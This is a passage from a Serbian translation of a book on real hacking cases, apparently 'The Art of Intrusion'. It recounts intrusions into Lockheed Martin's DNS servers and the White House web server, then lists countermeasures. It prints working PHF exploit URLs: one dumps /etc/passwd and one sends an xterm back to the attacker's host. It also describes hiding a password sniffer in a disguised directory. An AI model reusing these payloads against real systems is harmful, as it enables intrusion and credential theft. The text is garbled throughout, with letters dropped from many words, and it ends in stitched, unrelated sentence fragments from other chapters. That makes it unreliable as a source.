preuzmu najvei deo Pacifike komande) i pristupe raunarskim sistemima na brodovima amerike mornarice.11
Lino sam mogao da pobedim bezbednosne mehanizme telefonskih
centrala napravenim u kompaniji Baby Bells i kontroliem pristup tim
centralama. Pre deset godina imao sam potpunu kontrolu nad veinom
centrala koje su odravale kompanije Pacific Bell, Sprint, GTE i druge.
Zamislite haos koji bi snalaiva grupa terorista mogla da napravi kada
bi imala takav pristup.
lanovi organizacije Al Kaida i drugih teroristikih grupa i ranije su
koristile raunarske mree pri planirau teroristikih napada. Postoje
dokazi da su teroristi koristili Internet prilikom planiraa operacija za
napade 11. septembra.
Ako je Kalid Ibrahim i bio uspean u dobijau informacija preko
pomenutih hakera, to niko ne obelodauje. Nedostaje konaan dokaz
da je on zaista bio povezan s napadima na Svetski trgovinski centar i
Pentagon. Ipak, niko ne zna da li e se on ili neko slian ponovo pojaviti na kibernetikoj sceni, traei naivne pomagae koje uzbuuje pravee sr_ koja ne biste smeli da pravite, odlazak na mesta na kojima ne
biste smeli da budete. Klince koji bi mogli pomisliti da je ponueni
izazov kul.
Za mlade hakere, slaba bezbednost ostaje neprekidan podsticaj. Pa

ipak, hakeri iz ove prie trebalo je da prepoznaju opasnost kada ih je
strani dravanin regrutovao za kompromitovae osetivih amerikih
raunarskih mrea. Moram se zapitati koliko e drugih mladia kao to
je ne0h neprijate regrutovati.
U svetu punom terorista, dobra bezbednost nikada nije bila toliko
bitna kao danas.
SAETAK
47
ne0h nam je dao detae o nainu na koji je upao u raunarski sistem

Lockheed Martina. Pria je svedoanstvo o inovativnosti hakera (Ako
u bezbednosti postoji rupa, mi emo je pronai mogao bi biti hakerski
moto), ali i upozoree za svaku organizaciju.
ne0h je brzo utvrdio da Lockheed Martin ima sopstveni server za
prevoee imena domena (engl. Domain Name Servers, DNS). DNS
je Internet protokol koji, na primer, www.disney.com prevodi u
198.187.189.55, adresu koja se moe koristiti za usmeravae paketa s
porukama. ne0h je znao da je grupa za istraivae bezbednosti u Poskoj objavila ono to hakeri nazivaju exploit program koji je dizajniran tako da napadne jedan konkretan raiv deo da iskoristi slabost u
verziji DNS-a kompanije Lockheed.
Kompanija je koristila DNS protokol pod imenom BIND (Berkeley
Internet Name Domain). Poska grupa je otkrila da je jedna verzija
BIND-a slaba kada napad ukuuje prelivae udaenog bafera (engl.
remote buffer overflow), a upravo tu verziju imala je kompanija Lockheed Martin. Pratei metodu koju je pronaao na Internetu, ne0h je
mogao da doe do administratorskih privilegija i na primarnom i na sekundarnom DNS serveru Lockheeda.
Posle zauzimaa administratorskog naloga, ne0h je podesio presretae lozinki i e-pote instalirajui program za ukae. U tajnosti je
hvatao sav saobraaj. Podatke koje treba uskladititi, haker obino ae
na mesto gde je mala verovatnoa da e biti primeeni. Da bi sakrio
dnevnik prislukivaa, ne0h je napravio direktorijum sa imenom koje
je bilo samo razmak, predstaven s tri take. Prava putaa koja je koriena bila je /var/adm/ ... Tokom inspekcije administrator sistema
mogao je lako da previdi ovu bezopasnu stavku.
Umee provale
48
Tehnika sakrivaa programa za ukae, mada je u mnogim situacijama efikasna, prilino je jednostavna. Za prikrivae hakerskih tragova u ovakvim situacijama postoje i prefienije metode.
Pre nego to je otkrio da li e moi dube da prodre u mreu Lockheed Martina kako bi doao do poverivih informacija, ne0h je obratio
pau na drugi zadatak, pa su osetive datoteke kompanije ostale bezbedne.
Za upad u Belu kuu, Zyklon kae da je prvo pokrenuo program
CGI Scanner koji pregleda cini sistem traei slabosti standardnog interfejsa za prenos. Otkrio je da je Web prezentacija podlona napadu
pomou zloupotrebe PHF-a. Ona koristi greku koju je napravio programer PHF skripta (telefonskog imenika).
PHF je okruee zasnovano na obrascima. Ono prihvata ime kao
unos i na serveru trai podatke o imenu i adresi. Skript poziva funkciju
escape_shell_cmd(), koja bi trebalo da oisti unos od sumivih znakova. Ali, programer je sa liste izostavio jedan znak znak za novi red. Vrstan napada mogao bi iskoristiti taj previd tako to e unos postaviti u
obrazac koji sadri ifrovanu verziju (0x0a) znaka za novi red. Slae
znakovnog niza sa ovim znakom prevarie skript tako da izvri svaku
komandu koju napada odabere.
Zyklon je u svoj ita Weba uneo URL
http://www.whitehouse.gov/cgi-bin/phf?Qalias=x%0a/bin/
cat%20/etc/passwd
Tako je mogao da prikae datoteku s lozinkama za whitehouse.gov.

Meutim, on je hteo potpunu kontrolu nad Web serverom Bele kue.
Gotovo sigurno je znao da e ulazi X Servera biti blokirani zatitnom
barijerom, te da nee moi da se povee ni sa jednim od tih servisa na
prezentaciji whitehouse.gov. Zato je ponovo iskoristio rupu u PHF-u
tako to je uneo:
http://www.whitehouse.gov/cgi-bin/phf?Qalias=x%0a/usr/X11R6/
bin/xterm%20-ut%20-display%20zyklons.ip.address:0.0
Tako je terminalski emulator xterm poslat sa servera Bele kue na

raunar koji je on kontrolisao i na kom je radio X server. Drugim reima, umesto da se povee sa whitehouse.gov, on je sistemu Bele kue naredio da se povee sa im. (To je mogue samo kada barijera dozvoava
izlazne veze, to je ovde oigledno bio sluaj.)
Potom je iskoristio slabost prelivaa bafera u programu sistema

ufsrestore. Zyklon kae da mu je to omoguilo da zadobije administratorska prava na prezentaciji whitehouse.gov, i pristup serveru za potu
Bele kue i ostalim sistemima na mrei.
PROTIVMERE
49
Opisane zloupotrebe koje su pravili ne0h i Comrade pred sve kompanije postavaju dva problema.
Prvi je jednostavan i opte poznat: informisae o svim najnovijim
izdaima operativnog sistema i programa. Izuzetno je vano biti u toku
i instalirati bezbednosne zakrpe ili ispravke. Da biste bili sigurni da se
to ne radi nasumice, trebalo bi da osmislite i sprovodite program auriraa iji bi ci bio upozoravae odgovarajueg osoba im se pojavi
nova dopuna proizvoda koje kompanija koristi naroito operativnog
sistema, ali i aplikacionog softvera i firmvera.
Kada nova zakrpa postane dostupna, ona se mora to pre instalirati
odmah, ili im bude mogue. Nije teko razumeti premorene zaposlene koji su pod stalnim pritiskom obavaa obinih zadataka (instalirae sistema za nove radnike, na primer) i instaliraa zakrpa u dogledno
vreme. Meutim, ukoliko je ureaj s nepotpunim softverom dostupan
preko Interneta, nastaje veoma rizina situacija.
Brojni sistemi su ugroeni zbog neredovnog auriraa. im se neka
slabost objavi, prozor izloenosti je maksimalno otvoren sve dok proizvoa ne objavi zakrpu koja e popraviti problem, i dok je korisnici ne
instaliraju.
Vaa organizacija treba tom zadatku da d visok prioritet. Mora
postojati zvanian program upravaa zakrpama koji smauje izloenost to je mogue bre, ali tako da se ne ometaju osnovne operacije
poslovaa.
Ipak, ak i ako redovno instalirate zakrpe, to nije dovono. ne0h
kae da su neki upadi u kojima je uestvovao bili zloupotrebe nultog
dana (engl. zero day) upadi zasnovani na slabosti koja je poznata
samo u okviru male grupe hakera. Nulti dan je dan kada prvi put iskoriste tu slabost, a to je ujedno i dan kada proizvoa i udi koji se
bave bezbednou saznaju za u.
Umee provale
50
Poto uvek postoji mogunost takvih upada, svaka organizacija koja

koristi lo proizvod raiva je sve dok se ne objavi zakrpa ili zaobilazno
reee. Kako da smaite rizik od takve izloenosti?
Verujemo da je jedino vredno reee koriee modela dubinske
odbrane. Moramo pretpostaviti da e nai raunarski sistemi koji su
dostupni javnosti u nekom trenutku biti raivi na nulti dan. Zbog toga
treba da stvorimo okruee za smaivae potencijalne tete koju loi
momci mogu da naprave. Jedan primer, koji smo ranije pomenuli, jeste
postavae javno dostupnih sistema u DMZ zatitne barijere kompanije. Termin DMZ je pozajmen iz vojnopolitike skraenice za demilitarizovanu zonu i odnosi se na podeavae arhitekture mree tako
da sistemi koji su dostupni javnosti (Web serveri, serveri e-pote, DNS
serveri i slino) budu izolovani od osetivih sistema u mrei kompanije.
Primeivae arhitekture koja titi unutrau mreu jedan je primer
dubinske odbrane.
Takvim rasporedom, ak i ako hakeri otkriju dotad nepoznatu slabost
i dospeju do Web servera ili servera e-pote, korporativni sistemi u unutraoj mrei i dae e biti zatieni dodatnim bezbednosnim slojem.
Kompanije mogu organizovati jo jednu efikasnu protivmeru
praeem mree ili pojedinanih matinih raunara u potrazi za neuobiajenim ili sumivim aktivnostima. Napada obino izvodi odreene
akcije kada uspeno upadne u sistem na primer, pokuava da doe do
ifrovanih ili obinih tekstualnih lozinki, instalira zada vrata, mea
konfiguraciju datoteka kako bi oslabio bezbednost, ili mea sistemske,
programske ili dnevnike datoteke.
Praeem tih vrsta uobiajenog hakerskog ponaaa i uzbuivaem odgovarajueg osoba, lake ete kontrolisati tetu.
Drugo: nebrojeno puta su me novinari pitali koji je najboi nain
zatite poslovnog ili linog raunara u danaem neprijateskom
okrueu. Jedna od osnovnih preporuka jeste koriee jaeg vida
identifikovaa umesto statinih lozinki. Nikada neete znati, osim
moda kada sve bude gotovo, da li neko drugi zna koja je vaa lozinka.
Uz tradicionalne lozinke moete koristiti brojne tehnike prijavivaa na drugom nivou, koje omoguavaju mnogo veu sigurnost. Pored ranije pomenutog RSA SecureID-a, Safeword PremierAccess nudi
etone za generisae lozinke, digitalne sertifikate, smart kartice, biometriku i druge tehnologije.
Nedostaci ove vrste kontrolisaa identiteta jesu dodatni trokovi i

neprijatnosti za svakog korisnika. Sve zavisi od toga ta pokuavate da
zatitite. Statine lozinke su moda dovone za zatitu novih lanaka
Web prezentacije LA Timesa. Ali, da li se na ih moete osloniti kada
treba da zatitite specifikacije dizajna novog putnikog mlaznog aviona?
ZAKLJUAK
NAPOMENE
1. Do Terrorists Troll the Net?, Niall McKay, wired.com, 14. novembar, 1998.
2. Makajev lanak, op. cit.
3. Makajev lanak, op. cit.
4. Sa Web prezentacije satp.org, South Asia Intelligence Review.
5. The United States and the Global Coalition Against Terrorism, SeptemberDecember 2001: A Chronology, http://www.state.gov/r/pa/ho/pubs/fs/
5889.htm.
6. Obraae general-majora Yashwanta Devaa, Avsm (Retd), President lete,
na temu Information Security u Indijskom meunarodnom centru (India International Centre), Nju Delhi, 6. april 2002, strana 9.
51
Prie u ovoj kizi ali i novinski lanci, prikazuju koliko su ameriki

raunarski sistemi, a i sama nacija, podloni napadu. ini se da je veoma malo sistema zaista bezbedno.
U eri terorizma, jasno je da se rupe moraju boe krpiti. Epizode kao
to je ova, pokreu pitae s kojim se moramo suoiti: koliko lako se talenat i znaje nesavesnih tinejdera mogu okrenuti protiv nas i ugroziti
ameriko drutvo. Verujem da se jo u osnovnoj koli im se aci susretnu sa informatikom mora uiti o principima raunarske etike.
Nedavno sam prisustvovao prezentaciji Frenka Abignejla, protagoniste filma Uhvati me ako moe (Catch Me If You Can). Frenk je sproveo
istraivae o etikoj upotrebi raunara meu uenicima sredih kola
irom zeme. Svaki uenik je bio upitan da li je provaivae lozinke
kolskog druga prihvativo ponaae. Iznenauje da ak etrdeset osam
procenata ispitanih studenata smatra da je to u redu. S takvim stavovima
nije teko shvatiti zato udi uestvuju u ovakvim aktivnostima.
Ukoliko neko ima predlog kako da mladi hakeri budu mae podloni regrutovau od strane neprijatea, domaih i stranih, bilo bi dobro da nam saopti svoje ideje.
Umee provale
52
7. Ovo je teko potvrditi. Poto se napad dogodio za vreme Klintonove administracije, nijedna od navedenih osoba vie ne radi u Beloj kui. Ali dostupno
je nekoliko sitnica. Monti Hejms je pravio video-snimak. Kristofer Adams je
ime reportera britanskog asopisa Financial Times; koliko nam je poznato, u
Beloj kui nije bilo zaposlenog s tim imenom. Debra Rid je fotograf Associated
Pressa. Nismo pronali nikoga sa imenom Koni Kolabatisto ko je radio u Beloj
kui. ena s tim imenom udata je (ili je bila u to vreme) za Dina Kolabatista,
koji je bio predsednik odeea Solutions u kompaniji Space Imaging, ali
nema oigledne veze izmeu ih i tima u Beloj kui.
8. http://www.attrition.org/mirror/attrition/1999/05/10/www.whitehouse.gov/mirror.html.
9. I ovde je teko proveriti verodostojnost. Ipak, tekst koji je naveden moe
se videti na lokaciji http://www.attrition.org/mirror/attrition/1999/05/26/
mmic.snu.ac.kr/.
10. Computer Hackers Could Disable Military; System Compromised in Secret Exercise, Bil Gerc, Washington Times, 16. april, 1998.
11. Wars of the Future... Today, Tom Regan, Christian Science Monitor, 24.
jun, 1999.

Umece Provale

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Umece Provale

Uploaded by

Copyright:

Available Formats

Predgovor

Hakeri klinci i oni ne tako mladi neprestano se nadmeu meu

ivotu svakog kockara doe magian trenutak kad jednostavna

Zar ove maine nisu zasnovane na raunarima? Momci, vi se

Pitali smo se da li bismo mogli predvideti sekvencu karata. Ili,

programeri, a oni su vragolasti stvorovi. Pomislili smo da

Aleks je proitao kigu The Eudaemonic Pie Tomasa Basa (Thomas

objektnim kodom i pregledao strane pune heksadecimalnih brojeva

Aparat koji je Aleks odabrao koristio se ve desetak godina. Kad god

Otvorili smo je, izvadili ROM i utvrdili koji je to procesor. Ja

usredsredi. To je zato to osoba koja pie kd svud po emu ostava

Ponovno pisae koda

Imali smo motivaciju i non-stop smo radili. Mislim da nam je

Nadali smo se da je generator sluajnih brojeva bio relativno

Poglavlje 1: Hakerisanjem kazina do milion dolara

Meutim, uskoro su otkrili da ovaj generator ima fatalnu greku

Aleks je primetio da je trik u tome da ponete igru, vidite koje su

Seli smo za na aparat, pokrenuli svoj programi i on nam je

To uzbuee Aleks je pripisao oseau da ste pametniji od nekoga

sluajnih brojeva pravi petu, nauili sve bitne specifinosti maine i

Jedna je stvar privatno petati oko svog aparata, na bezbednoj lokaciji.

Poglavlje 1: Hakerisanjem kazina do milion dolara

Povratak u kazina ovaj put radi igre

samo je trebalo da proveri da li su na ekranu prikazane karte koje je

Ja bih poeo da igram, podeavajui tajmer na runom satu.

Karte koje je Aleks javao govorile su raunaru taan poloaj na kom

Poto bih restartovao broja sata, vraao sam se aparatu. Kada

Aleks je saznao da je provera ROM-a standardna procedura ve vie

Da su projektanti paivije proitali neke kige o sistemima

brojeva mnogo sloeniji: aparat je koristio dva generatora koji su se

namerno pa je prostor za ku ifre smaen sa 56 bitova na 30. ak i

Aleks: Obino bih raunar stavao u dep, u neto to je liilo

in, s minijaturnim dugmetom. Zaili smo i pare lastia koje

Pogledao sam ga oseajui blagu muninu u stomaku. Pomislio sam: To je to.

ovek je rekao: elimo da vam poklonimo ou za kafu.

Poglavlje 1: Hakerisanjem kazina do milion dolara

Majk je odabrao zelenu.

Ali Majk je tu disciplinu shvatao ozbinije i smatrao je da druga

On je vrlo pametan tip, samouk, nikada nije zavrio sredu

Snimili su mu anfas i profil, i oduzeli mu kompjuter i sav novac koji

Videli su da on osvaja nemogue sume i da se neto udno deava s

Ne oseam se nimalo loe zbog novca koji smo uzeli. To je samo

Reverznim ineeringom (tj. povratnom analizom) softvera momci

Proizvoai svakog proizvoda koji koristi ROM ipove i softver moraju

Zapeatite ip epoksidnom smolom, pa e se slomiti ako neko

Ukoliko je va firmver privatan i vredan, pregledajte najboe izvore

Poglavlje 1: Hakerisanjem kazina do milion dolara

vadesetogodii haker koji se potpisuje kao Comrade (Drug)

Inspirisao si me. Ti si bio moj j_ni mentor. Proitao sam sve o

Razliite grupe hakera okupaju se na nekoliko IRC kanala. Meu

Terorista Kalid baca mamac

Oko 1999, sa mnom je putem e-pote u kontakt stupio ovek

Oko 1998, na tim prilino ilegalnim kanalima, Comrade je poeo da

A bilo je tu i novca. ne0h je od Kalida dobio ponudu od 1.000 dolara

Nastavio sam jer sam tvrdoglav. Uzbuivala me je pomisao da

Koliko sam shvatio, on je plaao udima, ali ja nikada nisam

Rekavi da e mu ugovorenih hiadu dolara poslati potom, Kalid je

nisam imao i samo sam se izmotavao s im, tvrdio je haker. Kalid se u

Veeraa meta: SIPRNET

On uglavnom nije konkretno govorio ta hoe hteo je pristup

Na smrt sam se uplaio. On je bio lo. Oseao sam da moram

Bilo je tu udi iz NASA, Ministarstva odbrane, FBI-ja. Sve u

Ali egovu zabrinutost ublaavala je deaka pohlepa. I dae sam